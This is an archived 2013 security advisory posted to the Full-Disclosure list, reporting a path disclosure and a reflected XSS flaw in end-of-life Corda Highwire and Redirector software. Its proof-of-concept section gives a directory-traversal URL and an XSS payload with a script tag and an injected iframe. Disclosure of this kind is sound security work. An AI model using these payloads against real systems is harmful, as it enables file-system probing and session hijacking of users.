lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <DF1A979542A1D444B859DF9B06FB44C9076803C5@ORD2MBX03A.mex05.mlsrvr.com>
Date: Fri, 12 Jul 2013 16:56:23 +0000
From: Adam Willard <awillard@...egroundsecurity.com>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>,
  "submit@...sec.com" <submit@...sec.com>,
  "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>
Subject: [Foreground Security 2013-002]: Corda Path Disclosure and XSS

Corda Path Disclosure and XSS
============================================================
FOREGROUND SECURITY, SECURITY ADVISORY 2013-002
- Original release date: July 12, 2013
- Discovered by: Adam Willard (Software Security Analyst at Foreground Security)
- Contact: (awillard (at) foregroundsecurity (dot) com)
- Severity: 4.3/10 (Base CVSS Score)
============================================================

I. VULNERABILITY
-------------------------
Corda suffers Path Disclosure in Highwire.ashx and XSS vulnerabilities

II. BACKGROUND
-------------------------
Corda Highwire allows you to generate pdf documents
Corda Server .NET Redirector version: 7.3.11.6715 allows the Web server to handle client requests for visualizations.

III. DESCRIPTION
-------------------------
Corda Path Disclosure in Highwire.ashx
Corda Redirector XSS when a file isn't found


IV. PROOF OF CONCEPT
-------------------------
Path Disclosure
Execution of a url can expose the file system directory
/highwire.ashx?url=../../

XSS
Execution of a similar URL allows XSS to be run as long as the Domain of the File parameter matches the domains allowed
http://<URL>/Corda/redirector.corda/?@...LEhttp://<URL>/?<script>alert('Text')</script><iframe src=http://www.exploit-db.com></iframe>@_TEXTDESCRIPTIONEN


V. BUSINESS IMPACT
-------------------------
Discover path structure of a drive and attempt directory/file traversal
An attacker could perform session hijacking or phishing attacks.

VI. SYSTEMS AFFECTED
-------------------------
Systems implementing Corda/Domo products

VII. SOLUTION
-------------------------
Software has been marked EOL by Domo; Highwire products no longer supported.

VIII. REFERENCES
-------------------------
http://www.domo.com
http://www.foregroundsecurity.com

IX. CREDITS
-------------------------
This vulnerability has been discovered by Adam Willard (awillard (at) foregroundsecurity (dot) com)

X. REVISION HISTORY
-------------------------
- July 12, 2013: Initial release.

XI. DISCLOSURE TIMELINE
-------------------------
July 9, 2013: Issue identified within a deployed application by Adam Willard.
July 9, 2013: Vulnerability discovered by Adam Willard.
July 12, 2013: Contacted Vendor
July 12, 2013: Vendor commented that the software is EOL with no support.
July 12, 2013: Security advisory released.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ